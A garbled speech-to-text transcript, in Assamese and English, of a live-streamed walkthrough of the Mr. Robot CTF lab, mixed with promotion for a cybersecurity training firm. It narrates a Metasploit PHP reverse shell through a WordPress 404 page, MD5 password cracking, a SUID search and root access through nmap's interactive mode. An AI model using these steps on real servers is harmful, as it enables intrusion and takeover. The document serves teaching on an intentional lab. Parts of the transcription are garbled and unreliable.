এতিয়া আমি কৰিম আমি payload কোনটো ইউজ কৰিছিল ন আমি ইয়াক শিকাব লাগিব ন যে কোনটো payload ইউজ কৰি আছো okay so আমি ইউজ কৰিম set payload কোনটো ইউজ কৰিছিলো do you remember it আমি ইউজ কৰিছিলো php -p দিছিলো ন তাতে MSF Venomত okay so php/meter /reverse_tcp this is the one that we used okay reverse_tcp and আমি এটা কৰিম show options see ইয়াতে দুটা অপচন আছে সদায় show options কৰিব লাগে okay প্ৰথমতে আছে আমাৰ l host মানে লোকেল হোস্ট যোনটো আমি অলপ আগতে পাইছিলো and then we have l port যোনটো হল port যোনটো আমি দিছিলো so if you remember l host আমি আমাৰ নিজৰ ip address দিব লাগে so আমি নিজৰ ip address দিছিলো so আমি কৰিম set l host 192.168.1.144 I think 144 আছিলে yeah কৰিলো then set l port
Okay, we'll set L port 1337. So আমি দিছিলো 1337 also happens to be the hacker's number. Okay, so আমি এটো কৰিলো. Okay, so তাৰে মাজত okay, comments অলপ পিছত চাই আছো. Reverse TCP আমি direct TCP connection কৰি আছো Raviran. Okay, will direct হেতু কাৰণে reverse TCP দিয়ে connect কৰিব PHP টোৱে. Okay, so আমি L port কৰোঁ আকৌ এবাৰ আমি check, you should always check it once more. Okay, just show options. Okay, show options, and you can see now আমাৰ ইয়াতে IP address আৰু হেৰিটো হৈ গৈছে. Okay, now my favorite part, we will start the exploit. To start the exploit, we'll do exploit bus and enter. Started reverse TCP handler on this IP address and this port. Ahile yate. Okay, ami ako jam amar yate. Okay, so 404. Just tell me one thing. 404 to ketia solibo? Jetia error hai. Jetia ami ekhon enekwa page search korim. যোনখন পেজ এক্সিষ্ট নকৰে. অ'কে, চ' আমি দুটা কাম কৰিব পাৰোঁ. ইয়াতে যেনেকৈ 404.php আছে, আই উইল জুম হিয়াৰ. অ'কে, এইটো চি 404.php আছে. আইদাৰ উই কেন জাষ্ট go to here and type 404.php, or we will actually generate an error. ইচ্ছা কৰি আমি error কৰি দিম. চ' just type anything. Just rinkia ke papa. Okay, I'll press enter, and itia page not found page khon nahe karon ami ei code khini to gudi delete mari dili yar pora. Kintu ami jodi amar terminal ot jao, see something happen no agote yate asile ei line to loke ahi asile. Now meterpreter session 1 opened. Amar actually meterpreter etia on hoy goise. Tar mane ki we are directly connected to the server that is being hosted from Mr. Robot CTF. Okay, আমি ডাইৰেক্ট সেই সাৰ্ভাৰটোলৈ কানেক্টেড হৈ আছো যোনটোত এই ৱেবছাইটটো আছে. ঠিক আছে, চ' মাজতে দুটা কুৱেশ্যন. যোনটিয়া মাৰক আছে, where did you learn so much? I actually studied for years and years, but if you want to learn what I know and even more, you can always মাজতে এডভাৰটাইজটো কৰি ল, go to trustnetics.com/training. And we are actually completely changing our training module, so that is a good news. So we are taking a break from training for almost a month now, and during that time we are actually improving the training. We are increasing the number of days. Our training basically ghololeke hobo, basic professionally koro hobo, jate you will actually be able to become a professional within a few months of you have done the training. Okay, just kedin man bisote jate you can become a proper professional. So just come to Trustnetics, visit the website, check the course content, download the brochure. Okay? And even we are revamping the website as well. So just tell me whether we should release the website in a session like this. That would be better, right? Okay? So just go here, you can learn all these things. Okay? And so we are actually changing it to a CTF based approach of learning stuff. Okay, so we are experimenting on a new course. Okay, so jino ho kya hobo both advertising hoy gol, ami ako amar main kamole aho. Amar ta eta meterpreter shell, this is known as a meterpreter shell. Okay, so I'll just tell you je free no hoy, free no hoy, it's a paid course. Okay, etu amar ei session to hodai free thakibo, but of course the course is going to be free. Anything that will make you a professional will have to be paid in some way or the other. Okay, so eta meterpreter ki koribo pari ami ate help type kori pele sabo paru. Okay, meterpreter palu ami will type help and see all of these commands are coming here. Okay, so we'll see the ki commands. So background ekhini baro ene just normal. So cat marile read the contents of a file, cd mane change directory. Okay, so these are pwd mane print working directory or present working directory. So these are the commands. Okay, but the one that I want to use is shell. Okay, ami jodi eta ami shell use koru, we actually have now direct
কানেকশ্যন টু দ্য টাৰ্মিনেল আমি এইটো টাৰ্মিনেল যেনেকৈ ইয়াতে ইউজ কৰি আছোঁ যেনেকৈ আমি এতিয়া LS মাৰিলে ইয়াতে থকা ফাইলখিনি আহি যায় ন অ'কে ইয়াতে যোনখিনি মোৰ এইটো ডেস্কটপত লেটছ জাষ্ট অ'কে এই ডেস্কটপত যোনখিনি ফাইলছ আছে সেইখিনি ফাইল আমি LS মাৰি লিষ্ট হয় ন অ'কে যেনে CD আমি যদি ডকুমেণ্টছ কৰোঁ CD ডকুমেণ্টছ হৈছে ন এতিয়া PWD মাৰিছোঁ এই কমাণ্ডবোৰ যেনেকৈ চলি আছে মই যেতিয়া ইয়াতে শ্বেল মাৰিলোঁ এইমাত্ৰ নাও উই কেন পুট অল দ্য কমাণ্ডছ হিয়াৰ আৰু সেই কমাণ্ডছখিনি একচুৱেলি চলিব আই প্ৰমিছ চোৱা এইটো মই LS মাৰিছোঁ চি এই WP এডমিন পেজখনত আছোঁ ন আমি এতিয়া অলপ আগতে আছিলোঁ ন লগ ইন কৰি থকা সময়ত দেন ডেছবৰ্ডত আছিলে অ'কে চ' আমি LS মাৰোঁতে এইটো হৈছে PWD চাওঁ চি আমি ইয়াৰে ভিতৰত আছোঁ /opt/bitnami/apps/wordpress/htdocs আমি ইয়াৰে ভিতৰত আছোঁ অ'কে দেন আমি যদি এতিয়া যাওঁ CD/home অ'কে আকৌ PWD চ' আমি CDও কৰিব পাৰিছোঁ অ'কে we have actually come to a different folder as well and আমি এতিয়া LS মাৰি চাম ইয়াতে এটা এইটো LS -L দিলে আমাক অলপ বেছি ডিটেইলত চ' D মানে ডাইৰেক্টৰী দিছ ইজ এ ফল্ডাৰ অ'কে কনফিউজ হ'ব নালাগে ভেৰি ইজি থিংছ অ'কে অলপ মেবি ইণ্টাৰনেট কানেকশ্যনৰ ইছ্যু হৈ আছে নাথিং টু ৱাৰি অলপ মই শ্ল'লি যাম অ'কে চ' ৰবট বুলি এটা ফল্ডাৰ আছে চ' আমি কৰিম CD ৰবট অ'কে এণ্ড আকৌ চাম আমি ৰবটৰ ভিতৰত আছোঁ এতিয়া আমি LS মাৰি চাম অ'কে ইয়াতে দুটা ফাইল আছে চোৱা key2of3.txt আমি key1 of 3 পাইছিলোঁ ন অলৰেডি অ'কে আমি এতিয়া key2of3 আছে অ'কে key2 of 3 আছে এণ্ড দেন password.raw.md5 বুলি এটা ফাইল আছে ইয়াতে হয়তো কিবা পাছৱৰ্ড এটা থাকিব অ'কে চ' key2 of 3 যোনটো আছে আমি এইটো কি কৰিম এতিয়া কপি কৰিম এণ্ড আমি কেট কৰিলে ফাইল এটা পঢ়িব পাৰি অ'কে চ' আমি ইউজ কৰিম কমাণ্ড কেট মেকুৰী অ'কে এণ্ড আমি এইটো পেষ্ট কৰি দিম এণ্ড এণ্টাৰ চি কি আহিছে ইয়াতে পাৰ্মিশ্যন ডিনাইড কিয় হৈছে না এইটো পাৰ্মিশ্যন ডিনাইড বিকজ একদম বেছিক প্ৰব্লেম এটা হৈ আছে যোনটো আমি এতিয়া জাষ্ট যদি আমি আকৌ LS-L দি দিওঁ চ' দিছ ইজ অ'ন বাই দ্য ইউজাৰ ডেট ইজ নেমড ৰবট কিন্তু মই যদি এতিয়া চাওঁ হু এম আই ডেমন আই এম নট দিছ ইউজাৰ ন I have to be this user to be able to open this file okay eto read permission o nai okay so you will get to learn all of these things in a future session okay to right now ami robot user to prothomote hobo lagibo jontor karone ami ki koru etia ami to dhoribo para nai no for that there is another command but hetu lo ahi asu tar agote ami eta kaam koru etu file bodho ami kholibo parim okay karon ete read r ase no r mane read okay read permission এটা থাকা যেন পাইছো সো আমি কৰিম cat আৰু আমি এটো কৰিম কপি এন্ড ইয়াতে আমি কৰিম পেষ্ট সি ইয়াতে পাসওয়াৰ্ড ওকে সি ইয়াতে ৰবট এটো ইউজাৰ নেম হ'ব প্ৰবাবলি হয় না এন্ড ইয়াতে আহিছে আমাৰ পাসওয়াৰ্ড দিস ইজ দা পাসওয়াৰ্ড ওকে বাট এটো পাসওয়াৰ্ড যেন লাগা নাই দিস সিমস টু বি সাম সৰ্ট অফ এনক্ৰিপশন অৰ হ্যাশিং ওকে সো আই উইল টিচ ইউ এ শৰ্টকাট হিয়াৰ একদম এনেকুৱা ধুনীয়া শৰ্টকাট হয় এইটো জাষ্ট কাউণ্ট দ্য নাম্বাৰ অফ লেটাৰ্ছ হিয়াৰ অ'কে চি 4 8 12 16 20 24 28 32 there are 32 letters here okay কিমান আছে 32টা লেটাৰ্ছ আছে দ্য চিক্ৰেট ইজ যদি 32টা লেটাৰ্ছ হয় তেনেহ'লে অলমষ্ট সদায় সেইটো MD5 হ্যাশে হয় okay আৰু বাই দা ওয়ে ইয়াতে একচুয়ালি MD5 বুলি লিখাই আছে সো ওয়েল আই গেস আমি ইমান কাউন্ট নকৰিলে হলেতেন সো আমি এটা কি কৰিম আমি এটো MD5 ৰ পৰা আমি এটো ডিকোড কৰিব লাগিব okay আমি এটো ডিকোড কৰিব লাগিব সো ডিকোড কৰাৰ কাৰণে we can use hashcat which will actually take quite some time but to be honest we do not require hashcat because MD5 আমি Google search কৰিয়ে পাই যাও so আমি just ইয়াতে যাম Google search কৰিম এটো
ইয়াতে এণ্টাৰ মাৰি পেলাই পেষ্ট কৰি দিলে জাষ্ট কিবা এটা ৱেবছাইটত গ'লেই হ'ল যিকোনো ৱেবছাইট অ'কে চি দ্য MD5 হেছ ৱাজ ছাকচেছফুলি ৰিভাৰ্ছ ইন টু দ্য ষ্ট্ৰিং এৰ পৰা জেডলৈকে এইখিনি টাইপ কৰি দিছে ন চ' আমি এতিয়া কি কৰিম আমি এইটো ল'ম এইটো কৰিম আমি কপি অ'কে দিছ ইজ ছ' ইজি ৰাইট অ'কে আমি তাৰপিছত এতিয়া আমি ৰবট ইউজাৰটো হ'ব লাগিব ন আমি পাছৱৰ্ডটো এতিয়া দিব পাৰিম অ'কে এৰ পৰা জেডলৈকে আমাৰ হেৰিটো আছিলে চ' SU মাইনাছ ৰবট ছুইচ ইউজাৰ SU মানে ছুইচ ইউজাৰ আমি ইউজাৰটো চেঞ্জ কৰিব বিচাৰিছোঁ আমি বেলেগ এটা ইউজাৰ যেনেকৈ আমি উইণ্ড'জত এতিয়া লগ আউট কৰি পেলাই নতুন ইউজাৰটো টিপি দিওঁ ন আমি সিমান কৰিব নালাগে আমি ইয়াতে জাষ্ট SU ছুইচ ইউজাৰ দিলেই হ'ল এণ্ড ৰবট অ'কে চি ইয়াতে এটা দেখাইছে SU মাষ্ট বি ৰান ফ্ৰম এ টাৰ্মিনেল জাষ্ট টেল মি দ্য ডিফাৰেঞ্চ যে ইয়াতে যোনখন আমি টাৰ্মিনেল চলাই আছোঁ যোনটো এইটো ৰিম'ট চেল হয় আমাৰ অ'কে তাৰে সেইটো ডেস্কটপৰ অ'কে আৰু এইটো যোনটো হয় মোৰ ইয়াতে যোনটো আছে হোৱাট ইজ দ্য ডিফাৰেঞ্চ হোৱাট ইজ দ্য বেচিক ডিফাৰেঞ্চ ডেট ইজ বিং ডান হিয়াৰ ইউ ন' হোৱাট ইজ দ্য ডিফাৰেঞ্চ ইজ ইয়াতে আমাৰ ডলাৰ এটা আছে কিন্তু ইয়াতে ডলাৰটো নাই তাৰমানে আমি এখন লিমিটেড চেলৰ পৰাহে চলি আছোঁ অ'কে লিমিটেড চেলৰ পৰা চলি আছোঁ চ' হোৱাট উই নিড টু ডু ইজ উই হেভ টু স্পন এ চেল অ'কে এইটোক স্পনিং এ চেল বুলি কোৱা হয় চ' আমি যাম গুগল চাৰ্চত আমি যাম স্পনিং এ শ্বেল বুলি চাৰ্চ কৰিম কি বুলি চাৰ্চ কৰিম স্পনিং SPAWNING স্পনিং এ শ্বেল আমি তাৰপিছত এইটো প্ৰথম যোনটো ৱেবছাইট আছে সেই ৱেবছাইটটোতে যাম এণ্ড চি ইয়াতে অপশ্যন দিছে বহুত কিবা কিবি অ'কে দে হেভ গিভেন আছ মেনি অপশ্যনছ অ'কে চ' গাইজ I need one little help from you. I actually do not know if the quality is good enough and you can understand what is being shown on the screen. So just comment ki thik hai ase ne nahi. Okay. So ami ইতিমধ্যে ইয়াতে বহুত কেইটা অপশ্যন আছে ইয়াৰ যিকোনো এটা কমাণ্ড উঠাই পেলাই ইয়াতে বহাই দিলে হ'ল ঠিক আছে আমি প্ৰথমটোৱে লওঁ ঠিক আছে এইটো কৰিম আমি কপি আৰু ইয়াতে আহি আমি কৰি দিম পেষ্ট এণ্টাৰ মাৰিম ইয়াতে ডলাৰটো আমাৰ আহি গ'ল চ' এতিয়া চি দ্য ডলাৰ ইজ কামিং হিয়াৰ অ'কে চ' আমি আকৌ কি কৰিম SU মাইনাছ আমি এইটো কি কৰিলোঁ স্পনিং এ শ্বেল অ'কে স্পনিং এ শ্বেল কৰিলোঁ আমি কৰিম ৰবট পাছৱৰ্ড খুজিছে পাছৱৰ্ড আমি ক্ৰেক কৰিছিলোঁ ইয়াতে এইটো কপি আনিলোঁ আমি দুটা পাছৱৰ্ড ক্ৰেক কৰিলোঁ বাইদেউ এতিয়ালৈকে অ'কে এণ্ড আমি ইয়াতে এতিয়া কৰিম পেষ্ট এণ্ড এতিয়া who am I some robot see মই ৰবট ইউজাৰটো হৈ গ'লোঁ এতিয়া মনত আছে আমি LS কৰোঁতে যে কি 2 of 3 বুলি এটা আছিলে অ'কে it goes blurry no it's quite clear okay so maybe অলপ so my internet connection is very bad I paid too much for it and it's just horrible I'm very sorry about that but উপায় নাই কি কৰিবা no यार আমাৰ ইণ্টাৰনেট কানেকশ্যনৰ এইটো অ'কে আমি কেট কৰিম এতিয়া অ'কে কেট এণ্ড উইল পেজ দ্য হেৰি এণ্ড এণ্টাৰ চি দিছ ইজ আৱাৰ ছেকেণ্ড ফ্লেগ আমি দুটা ফ্লেগ চ' 66% অফ দ্য CTF more than 66% অফ দ্য CTF ইজ নাও কমপ্লিট আমি ইমানখিনি কৰিলোঁ এতিয়া অলৰেডি অ'কে চ' আমি এইটো এতিয়া আকৌ কপি কৰিম এণ্ড আমি ইয়াতে কি টু পেষ্ট কৰি ল'লোঁ অ'কে আমাৰ তাত এতিয়া ছেকেণ্ড কিটো আহি গ'ল দুটা কি আমাৰ হৈ গ'ল এতিয়া জাষ্ট আমাক আৰু কেইটা কি লাগে উই জাষ্ট নিড ওৱান মোৰ কি এণ্ড আমি নট এ জিঅ' ইউজাৰ য়েট একচুৱেলি Okay, I know everyone hates Jio nowadays, but yeah, Jio use kori thaka nai. I'm using Mnet, jonto fiber hai, but their service is not as satisfactory as I would have liked. Okay, so ami etia eta kaam korim. Amak etia final flag khon lage na. Ami olop etia bisarim. Okay, we'll search for the final flag. Ma eta kaam koro.
এইটো অলপ হেৰি কৰি দিওঁ যাতে কমাণ্ডটো অলপ ক্লিয়াৰলি আহে অ'কে চ' আমি কি কৰিম এতিয়া আমি ৰুট ইউজাৰলৈ যাম এতিয়া আমি ৰবট ইউজাৰটো আছিলোঁ ন cd স্লেছ ইয়াতে আমাৰ ৰুট ইউজাৰৰ ফাইল চোৱা ইয়াতে এইবিলাক কিবা কিবি আছে ৰান এইটো ৰুট বুলি এটা ফল্ডাৰ আছে ন চ' ৰুট ইউজাৰ যোনটো লিনাক্সত এটা যোনটো চবতকৈ পাৱাৰফুল ইউজাৰ হয় সেই ইউজাৰটোৰ নাম হ'ল ৰুট অ'কে ৰুট ইউজাৰটোত আমি যাম এণ্ড গৈ পেলাই আমি তাতে চেক কৰিম যে সিহঁতৰ কিবা প্ৰব্লেম হৈ আছে নেকি চৰি মই ভুলটা কৈছোঁ সিহঁতৰ কিবা ভালনেৰেবিলিটি আছে নেকি যোনটো আমি ইউজ কৰিব পাৰিম অ'কে হুইচ উই কেন ইউজ ফৰ আৱাৰ ভালনেৰেবিলিটি অৰ তাতেই কিবা ফ্লেগ এখন হয়তো সোমাই আছে চ' উইল জাষ্ট গ' টু cd ৰুট আমি এইটো চেঞ্জ ডাইৰেক্টৰী কৰিব নোৱাৰোঁ উই কেনট ইভেন চেঞ্জ দ্য ডাইৰেক্টৰী টু দ্য ৰুট ফল্ডাৰ ইয়াতে আমাক কৈ আছে পাৰ্মিশ্যন ডিনাইড ডু ইউ ন' হোৱাই বিকজ দিছ ফল্ডাৰ আমি যদি -l দি দিওঁ উইল চি যে যোনটো ৰুট ফল্ডাৰ হয় ইট ইজ অ'ন বাই ৰুট অ'কে দ্য ৰুট ইউজাৰ owns দ্য ৰুট চ' আমি ৰুট ইউজাৰ হ'ব লাগিব প্ৰথমতে চ' আমি ৰুট ইউজাৰ হয়নে নহয় ডু ইউ ন' হাউ উই কেন ফাইণ্ড আউট উই অলৰেডি ন' pwd প্ৰেজেণ্ট ৱৰ্কিং ডাইৰেক্টৰী okay no sorry who am I okay we already know who am I eto robot ahise jodi root user holo yate root ahile haten okay so ami ki korim yate we will just click this id okay see yate uid robot ase karane yate dekhai ase 1000 something okay see 1000 to 1000 something eneke dekhai ase but যদি ৰুট ইউজাৰ হ'লে জাষ্ট কেন চামৱান কমেণ্ট যে ৰুট ইউজাৰ হ'লে ইয়াতে কি আহিলে হয় অ'কে চামৱান জাষ্ট কমেণ্ট অ'কে কমেণ্ট কৰি পেলাই মোক কোৱা যে ৰুট ইউজাৰ হোৱা হ'লে ইয়াতে এইটো UID-টো কি হ'লহেঁতেন অ'কে চ' সেইটোত আহি আছোঁ তেতিয়ালৈকে আই উইল টেল ইউ যে আমি ৰুট ইউজাৰ এতিয়া কেনেকৈ হ'ব পাৰোঁ অ'কে কোনে কোনে গডফাদাৰ চাইছা So if you watch Godfather, in that family, the weakest person was Fredo. Okay. So Godfather family tor enemies okay, enemies ki kore, tumar Fredo use kore to gain access to the family. Okay. Weakest software. So Fredo vulnerability asile no. So tar vulnerabilities kini use kore okay so etia ami ki korim we will find some of the tools that root user is using okay root user use kori thakar ketaman tools ami bisarim thik ase and we will find those tools and commands and he eta use kori pele ami etia we will basically get the root shell somehow okay eko chinta koribo laga na again very easy just to find out which ones are using root okay Biraj Gogoi very good 000 so UID jodi 0 hoy that means success we have successfully come to the root shell okay we have successfully achieved the root shell okay so okay এতিয়া আমি এটা সিম্পল চাই কমান্ড এটা ইউজ কৰিম which is known as find /-perm okay -4002 greater than /dev/null এই কমান্ডে বেলে একো নকৰে it will just give us a list okay যত সেই লিষ্টখনত প্ৰত্যেকটোৱে তাৰ মানে কি ইউজ কৰি আছে root user ইউজ কৰি আছে okay so we'll click on enter okay this is bad okay I'm connected again okay ठीक है so as I'll just quickly recap what I said so this is the command okay this is the command that we need here okay a command to basically ki koribo this command will basically give us a list of the tools that are being used by the root user jar root permission ase okay so hey tools khini just check kun he tools as well mount ping 6 su switch user alabagate okay ebla kiba kibi ase so I can kind of see just one tool okay which might be vulnerable to attack and that is nmap okay ami yate nmap pai aso so ami yate nmap use koribo paro
Okay, so আমি ইয়াতে জাষ্ট এটা কাম কৰোঁ nmap বুলি টাইপ মাৰি দিওঁ আৰু এসোপা বস্তু লিখা আহি গৈছে অ'কে চ' বেচিকেলি nmapৰ ইমপ্লিমেণ্টেশ্যন কি কি আছে চ' আমি এতিয়া কি কৰিম nmap ইজ গোয়িং টু বি আৱাৰ ফ্ৰেডো ফ্ৰম গডফাদাৰ অ'কে আমি কি কৰিম nmap যোনটো আছে nmapক ইউজ কৰি পেলাই আমি ৰুট ইউজাৰ হৈ যাব পাৰিম তাৰমানে অ'কে ডেটছ হোৱাট উই আৰ গোয়িং টু ডু নাও ইন দিছ ষ্টেপ চ' nmap আমি লৈছোঁ nmapত চ' ইয়াতে এটা ছেটিংছ এটা আছে argument এটা আছে this is an argument okay which is interactive okay so go into interactive mode মানে কি জানে শ্যালৰ নিচিনাকৈ আহি যায় okay so আমি কি কৰিম nmap interactive see ইয়াতে এখন শ্যাল আহি গ'ল ডলাৰটো গুচি গ'ল যেনেকৈ আগতে আমাৰ ডলাৰটো আছিলে ইয়াতে nmap বুলি আহি গ'ল ইয়াতে okay so এতিয়া আমি nmapৰ কিবা কিবি ইউজ কৰিব পাৰোঁ now suddenly something is about to happen okay just watch it carefully I'll type something I'll just type 3 letters okay zoom কৰি দিছোঁ okay I'll just type 3 letters and I'll just quickly show you one thing if you are the normal user সদায় ডলাৰ আহে okay for a normal user it will always come as হেৰি okay so if you are the root user সদায় হ্যাশ আহে okay কি আহে হ্যাশ আহে ডলাৰটো চেঞ্জ হৈ পেলাই হ্যাশ হৈ যায় okay so suppose এতিয়া যদি exit দি দিওঁ it will always come as dollar okay so এতিয়া আমাৰ ইয়াতে ডলাৰে আছিলে root user এতিয়া আমি nmapৰ ইণ্টাৰেক্টিভৰ ভিতৰত আছোঁ অলপ কানেকশ্যনৰ ইছ্যু হৈ আছে জাষ্ট গিভ মি এ ছেকেণ্ড অ'কে চ' মাজে মাজে অলপ কানেকশ্যন ইছ্যুজ হৈ থাকে বাট হোপফুলি নেক্সট অ'কে চ' জাষ্ট লুক এট দিছ অ'কে জাষ্ট 3 letters what 3 letters can do we have our root user okay see মই শিকাইছিলোঁ ন কি কমাণ্ড ইউজ কৰিলে গম পাই ৰুট ইউজাৰ হয়নে নহয় হু এম আই ইউ আই ডিটো যদি 0 আহে কি হয় তাৰমানে ৰুট হয় ইটছ দ্য ৰুট ইউজাৰ নাও অ'কে উই হেভ একচুৱেলি গেইন ৰুট শ্বেল okay that too in a very short time of 1 hour and 20 minutes okay তাকো কিমান লাহেকে ইণ্টাৰনেটৰ মাজতো কৰা সত্ত্বেও okay আমি এটা মেচিন হ্যাক কৰি দিছোঁ ইন এ ভেৰি শ্বৰ্ট স্পেন অফ টাইম okay এতিয়া আমি এটা কাম কৰিম আমি যাম cd/root তেতিয়া যাব দিয়া নাছিলে ন pwd ক'ত আছোঁ /rootত কেতিয়াবা ক'ৰবাত যাব নোৱাৰি ছাডেনলি পাৰ্মিশ্যন পাই যোৱা যায় এণ্ড তাৰপিছত গৈছোঁ একদম চকুন মিলা that's how it feels right now okay so /rootত আমি আছোঁ এতিয়া and আকৌ ls মাৰি চাওঁ see key 3 of 3.txt আছে এইটো আমি কৰিম কি will copy this and আমি কৰিম cat and paste বাপৰে we got the final key okay copy selection and we will come here and key 3 and paste congratulations everyone we have won the Mr. Robot CTF okay and this was Mr. Robot so if any of you have any questions I am more than welcome we have more than 10 minutes to ask we will finish the show so do ask me any question that you might have so the thing until then I'll just make a monologue here so the thing about hacking is there is to be honest there is nothing to be gained by hacking someone's some random account or that is not hacking at all that is just stealing okay that is just kind of stealing and wait a second the network is gone again okay so the thing is when you are in a cybersecurity working position
বহুতখিনি কাম কৰিব পৰা যায়. You can earn a lot of money, which is good. I guess that is the only point. So you can earn a lot of money, that's why join cybersecurity. No. But if you want to learn hacking, that either has to be because you are very, very, very passionate about tech, or if you want to learn hacking, that has to be because you want a career out of it. But if you are only hacking some Windows machines every now and then, randomly just as a prank or something, that is not going to be enough. You need to go somewhere and learn everything properly. You need to get proper knowledge of how networks work. You need to know how operating systems work, how the internet works even. Okay, so have you just ever imagined that how when you just type the name of a website, কেনেকে তোমাৰ browser within milliseconds আহি পায়? Okay, so that's the way. Okay, so Ravi Ranjan Kumar says, hope you bring a session related to Android. Okay, that is a good idea actually. Yeah, Android security is a very in-depth topic, and we might be able to do something about it. Yeah, it's in a good pitch, Ravi. Thank you. And how to list all the payloads in Metasploit? Can you show once? Okay, good question. I don't remember it. Okay, so I will just Google search it. List all in Metasploit. Okay, so you can't remember everything. So yeah, I do remember one thing. So what you can use is, so আমাৰ এইটোতো হৈ গ'ল বাৰু. You can use Searchploit. Okay, SEARCH, Searchploit. Okay, so Searchploit on, you can okay, so Searchploit, let's say ki Windows lage. Okay, Windows. So all the vulnerabilities that you want. Okay, Biraz has given the answer. List minus payload. এইটোৰ আগতো কিবা থাকিব নে খালি এইখিনি হ'ব আৰু কিবা এটা লাগিব নেকি তোমাৰ মিছ হৈছে বোধে ন বিৰাজ কমাণ্ডটো? Okay, so যি নহওক কিয়, so all the exploits related to Windows Searchploit এদি বিচাৰি পাই যায়. Okay, Searchploit Windows 7. Okay, Windows base 7. Okay, so Windows 7 or এতিয়া আমাৰ vulnerability হয়তো দেখাই দিব. Okay, নে এনেকে. Okay, অলপ মোৰ actually hang হৈ গৈছে VM টো. Actually live stream ও লগে কৰা আছে ন. Okay, inside MSF console you can type list and dash payload. Okay, so আমি এইটো কৰি চাওঁ নেকি? We can do this now actually. So what we need to do is we can type exit and exit swiper. Okay, meter preter আহি গ'লো. এইটো কৰি দিওঁ, control C মাৰি দিলে হয় exit. Okay, so এইটো MSF কোন list payload. No, aha nahi. Maybe payloads list. Okay, chalo koi baat nahi. So as I was saying, kahan gaye? Okay, okay, so okay, yeah, maybe payloads. Okay, to silom bar hobo ekone. So what is the scope of physical paint in Northeast India? Scope right now, well, it's tough. I think Trustnetics is the only company that hires pen testers, either contractually or permanently, and in Northeast. And there are other companies though, like
banks and all, CID will definitely hire you if you're good enough and trustworthy. And yeah, potentially both hai, because if you have noticed, এতিয়া আমাৰ startup India and startup Assam and কিমান হৈ আছে, and startups are coming up left and right. And even some startups that I know have suffered cyber attacks constantly. So yeah, there is a scope, and people are getting more and more aware, and we are actually trying from Trustnetics that we will make the businesses more aware that that's the point basically. So that will eventually end up with people hiring more and more cybersecurity pen testers. Okay. So what if I want to learn from you? Yeah, Ravi, definitely come to Trustnetics. It's in Soy Mile, Guwahati. I'd be more than happy to teach you as much as possible. We are going to start our training, resume our training again from Feb. January no koro. We are not taking a new batch in January. We are completely rehauling our entire training module. It was shorter earlier. We are making it much longer now. So at least 30 days training hobo. We're changing everything. And earlier someone asked about the fee structure. So yeah, I cannot find the comment, but someone had asked for the fee structure. So the fee structure, actually it used to be a different one. Now I mean change Korea so fee structure to go along with the new course. So follow us on Instagram, check trustnetics.com regularly, and Instagram on follow korile hol, or you can just text me. My number is 70022213446. Just text me every now and then if there is a new course coming. I'm more than happy to reply to you. I will not crack your girlfriend's password. That is not going to happen. I have just too many people asking me, will you crack her password? Including one lady who asked me that if I can hack her husband's phone. Okay, so they're all that apart. Just bad, really bad. Okay, so yeah, so I have a business of my own that I can't leave. Any online classes will be a bit difficult. Okay, Bidyut Sakya, yeah. Thank you, Biras. Bidyut, we are changing the fee structure, but you can give me a call. The number is 70022213446, and or WhatsApp me. That's even better, and I will give you all the information you want. Okay. So Ravi, actually, we did online courses earlier, but they are not very beneficial either to us, neither to us nor to our students. So we stopped that, and now that the pandemic situation has become, well, we're used to it now. So we are going to office, we are going to shops and everywhere. So we have started our physical training as well. 13446. Okay, 7002213. I'll comment. Okay, I'll comment. Okay. So yeah, it's a bit difficult, Ravi. I'm really sorry, but I will definitely try to bring it online. There are some plans to have a proper live session kind of online classes, but it's not going to be anytime very soon. But Ravi, you have been very interactive today, and so yeah, so maybe in the future some online thing will be there, but not right now. But Ravi, I'm really grateful that you have joined us today, and it has been good. You have given good answers, and your questions have been good as well. Do join us for the future sessions, and yeah, just come to us somehow. Someday we will manage something for the training. Okay. Any more questions? Any questions about anything? No problem. If I know the answer, well, I'll answer. If I don't know the answer, then to কোনবাই কমেণ্টত কৈ দিব.
No questions? Okay, actually Baroda Bazile. So yeah, I'm very glad that so many people have stayed online all this while watching me just doing random hacking stuff. But yeah, I will try to make this more and more exciting as much as so yeah. So Ravi, I that is a good thing. So yeah, there is one thing. Follow us on Instagram. I do visit. Wait a second. The internet. Okay, so I have. Yeah, the internet connection is just horrible. Okay, so yeah, I have definitely come to Tezpur in March. In fact, I came to Tezpur, and I had the best time. Tezpur University, I gave a small workshop, and yeah, perhaps we can meet that way somehow because মোক মাতিয়ে থাকে colleges and universities. Okay, so Abhijit Neok, there are no prerequisites. We teach from the very basics. Okay, and just you need to be 18 years old. Okay, so we do not want to risk it. Okay, so yeah, so there are no prerequisites. You can be from art stream, any stream. Okay, commerce, computer science, soleto thike ase, but there is no difference, to be honest. We'll teach you in no matter what field you are in, so no problem. You just need to come and we'll teach you from the scratch to the advanced level. And then we have internships also. And do you know about our exam? So we have an exam which is 8 hours long. And wait, okay. So it's so my personal Instagram ID is subhasmit.malagar. Okay. And Trustnetics is X. Okay. It's Instagram. Okay. So yeah, so it doesn't matter what you are learning. Just come to us. I'm ekdom from scratch to very advanced level. So our exam, yeah, I was talking about the exam. Exam to our ki hai 8 hours on non-stop exam hai. You have to hack 5 machines like these. Okay, pasta machine eneka hack koribo lage. You have 8 hours and you have to hack 4 machines at least to pass the exam. Good news is you can have your books and your notes and everything in the exam itself, no problem. You can even call someone up to help Koridasun. Okay, so no, don't call someone up, don't do that. But yeah, it's a completely open book exam, and even on internet khula thakibo, you can use the internet also, no problem. The main point is you have to solve it within the 8 hours. Okay, that's the main point. So that's the exam. We have the TCC-SP exam, Trustnetics Certified Cybersecurity Professional. Okay, so that's the exam we have. So Zontia Morok, hello, Bongaigaon, so much. Yeah, do come to Guwahati, and we will teach you as much as possible. Okay. So as I said, prerequisites ekone, just 18 years old. We teach you from the scratch. Okay. Yeah, thank you, Ravi. It was a very nice time chatting with all of you guys. Do tell your friends and share this video. I'm sure many people who are very interested but have no মানে নাজানে অসমত ক'ত যাম কি কৰিম. Okay, so it will be very useful for them. And thank you. Namaskar thakile sobake, and good night. I'll come again soon, either on Monday or Tuesday. We'll do one more session. Okay, aru ki interesting kiba koribo pari ami sam. Chalo, bye bye.